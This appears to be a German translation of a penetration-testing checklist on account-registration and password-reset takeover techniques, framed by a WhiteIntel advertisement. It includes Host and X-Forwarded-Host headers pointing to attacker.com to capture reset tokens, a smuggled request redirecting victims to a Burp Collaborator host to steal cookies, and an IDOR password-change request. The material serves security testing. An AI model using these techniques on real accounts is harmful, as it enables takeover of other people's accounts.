Registration & Takeover Vulnerabilities
WhiteIntel ist eine von Dark Web angetriebene Suchmaschine, die kostenlose Funktionen bietet, um zu überprüfen, ob ein Unternehmen oder seine Kunden von Stealer-Malware kompromittiert wurden.
Das Hauptziel von WhiteIntel ist es, Kontoübernahmen und Ransomware-Angriffe aufgrund von informationsstehlender Malware zu bekämpfen.
Sie können ihre Website besuchen und ihren Dienst kostenlos ausprobieren unter:
Registrierungsübernahme
Duplikatregistrierung
Versuchen Sie, mit einem vorhandenen Benutzernamen zu generieren
Überprüfen Sie die Variation der E-Mail:
Großbuchstaben
+1@
fügen Sie einige Punkte in die E-Mail ein
Sonderzeichen im E-Mail-Namen (%00, %09, %20)
Setzen Sie schwarze Zeichen nach der E-Mail:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Benutzername Aufzählung
Überprüfen Sie, ob Sie herausfinden können, ob ein Benutzername bereits in der Anwendung registriert wurde.
Passwortrichtlinie
Beim Erstellen eines Benutzers überprüfen Sie die Passwortrichtlinie (überprüfen Sie, ob Sie schwache Passwörter verwenden können). In diesem Fall können Sie versuchen, Anmeldeinformationen per Bruteforce zu ermitteln.
SQL-Injection
Überprüfen Sie diese Seite , um zu lernen, wie Sie Kontoübernahmen versuchen oder Informationen über SQL-Injections in Registrierungsformularen extrahieren können.
Oauth-Übernahmen
pageOAuth to Account takeoverSAML-Schwachstellen
pageSAML AttacksE-Mail ändern
Nach der Registrierung versuchen Sie, die E-Mail zu ändern und überprüfen, ob diese Änderung korrekt validiert wird oder ob Sie sie in beliebige E-Mails ändern können.
Weitere Überprüfungen
Überprüfen Sie, ob Sie Wegwerf-E-Mails verwenden können
Langes Passwort (>200) führt zu DoS
Überprüfen Sie die Ratenbegrenzungen bei der Kontenerstellung
Verwenden Sie username@burp_collab.net und analysieren Sie den Rückruf
Passwortzurücksetzungsübernahme
Passwortzurücksetzungstoken-Leak über Referrer
Fordern Sie das Zurücksetzen des Passworts an Ihre E-Mail-Adresse an
Klicken Sie auf den Link zum Zurücksetzen des Passworts
Ändern Sie das Passwort nicht
Klicken Sie auf beliebige Websites von Drittanbietern (z. B. Facebook, Twitter)
Unterbrechen Sie die Anfrage im Burp Suite-Proxy
Überprüfen Sie, ob der Referrer-Header das Zurücksetzen des Passworttokens preisgibt.
Passwortzurücksetzung-Vergiftung
Unterbrechen Sie die Passwortzurücksetzungsanfrage im Burp Suite
Fügen Sie die folgenden Header in Burp Suite hinzu oder bearbeiten Sie sie:
Host: attacker.com
,X-Forwarded-Host: attacker.com
Leiten Sie die Anfrage mit dem geänderten Header weiter
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Suchen Sie nach einer Passwortzurücksetzungs-URL basierend auf dem Host-Header wie:
https://attacker.com/reset-password.php?token=TOKEN
Passwortzurücksetzung über E-Mail-Parameter
IDOR auf API-Parametern
Der Angreifer muss sich mit seinem Konto anmelden und die Funktion Passwort ändern aufrufen.
Starten Sie Burp Suite und unterbrechen Sie die Anfrage.
Senden Sie sie an den Repeater-Tab und bearbeiten Sie die Parameter: Benutzer-ID/E-Mail
powershell POST /api/changepass [...] ("form": {"email":"opfer@email.com","password":"sicherespwd"})
Schwacher Passwort-Reset-Token
Der Passwort-Reset-Token sollte jedes Mal zufällig generiert und einzigartig sein. Versuchen Sie festzustellen, ob der Token abläuft oder ob er immer derselbe ist. In einigen Fällen ist der Generierungsalgorithmus schwach und kann erraten werden. Die folgenden Variablen könnten vom Algorithmus verwendet werden.
Zeitstempel
Benutzer-ID
E-Mail des Benutzers
Vor- und Nachname
Geburtsdatum
Kryptografie
Nur Zahlen
Kleine Token-Sequenz (Zeichen zwischen [A-Z,a-z,0-9])
Token-Wiederverwendung
Ablaufdatum des Tokens
Durchsickern des Passwort-Reset-Tokens
Lösen Sie eine Anfrage zum Zurücksetzen des Passworts über die API/UI für eine bestimmte E-Mail aus, z.B.: test@mail.com
Überprüfen Sie die Serverantwort und suchen Sie nach
resetToken
Verwenden Sie dann den Token in einer URL wie
https://beispiel.com/v3/benutzer/passwort/zurücksetzen?resetToken=[DER_RESET_TOKEN]&email=[DIE_MAIL]
Passwort zurücksetzen über Benutzername-Kollision
Registrieren Sie sich im System mit einem Benutzernamen, der identisch mit dem Benutzernamen des Opfers ist, jedoch mit Leerzeichen vor und/oder nach dem Benutzernamen eingefügt. z.B.:
"admin "
Fordern Sie ein Passwort-Reset mit Ihrem bösartigen Benutzernamen an.
Verwenden Sie den an Ihre E-Mail gesendeten Token und setzen Sie das Passwort des Opfers zurück.
Melden Sie sich mit dem neuen Passwort im Opferkonto an.
Die Plattform CTFd war anfällig für diesen Angriff. Siehe: CVE-2020-7245
Kontoübernahme über Cross-Site-Scripting
Finden Sie ein XSS innerhalb der Anwendung oder eines Subdomains, wenn die Cookies auf die übergeordnete Domain beschränkt sind:
*.domain.com
Leaken Sie das aktuelle Sitzungscookie
Authentifizieren Sie sich als Benutzer mithilfe des Cookies
Kontoübernahme über HTTP-Request-Smuggling
1. Verwenden Sie smuggler, um den Typ des HTTP-Request-Smugglings (CL, TE, CL.TE) zu erkennen
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Erstellen Sie eine Anfrage, die das POST / HTTP/1.1
mit den folgenden Daten überschreibt:
GET http://something.burpcollaborator.net HTTP/1.1 X:
mit dem Ziel, Opfer auf burpcollab umzuleiten und ihre Cookies zu stehlen
3. Die endgültige Anfrage könnte wie folgt aussehen:
Hackerone Berichte über die Ausnutzung dieses Fehlers * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Accountübernahme über CSRF
Erstellen Sie ein Payload für CSRF, z.B. "HTML-Formular mit automatischem Absenden für eine Passwortänderung"
Senden Sie den Payload
Accountübernahme über JWT
JSON Web Token kann verwendet werden, um einen Benutzer zu authentifizieren.
Bearbeiten Sie das JWT mit einer anderen Benutzer-ID / E-Mail
Überprüfen Sie die schwache JWT-Signatur
Referenzen
WhiteIntel ist eine von Dark Web angetriebene Suchmaschine, die kostenlose Funktionen bietet, um zu überprüfen, ob ein Unternehmen oder seine Kunden von Stealer-Malware kompromittiert wurden.
Das Hauptziel von WhiteIntel ist es, Accountübernahmen und Ransomware-Angriffe aufgrund von informationenstehlender Malware zu bekämpfen.
Sie können ihre Website besuchen und ihre Engine kostenlos ausprobieren unter:
Last updated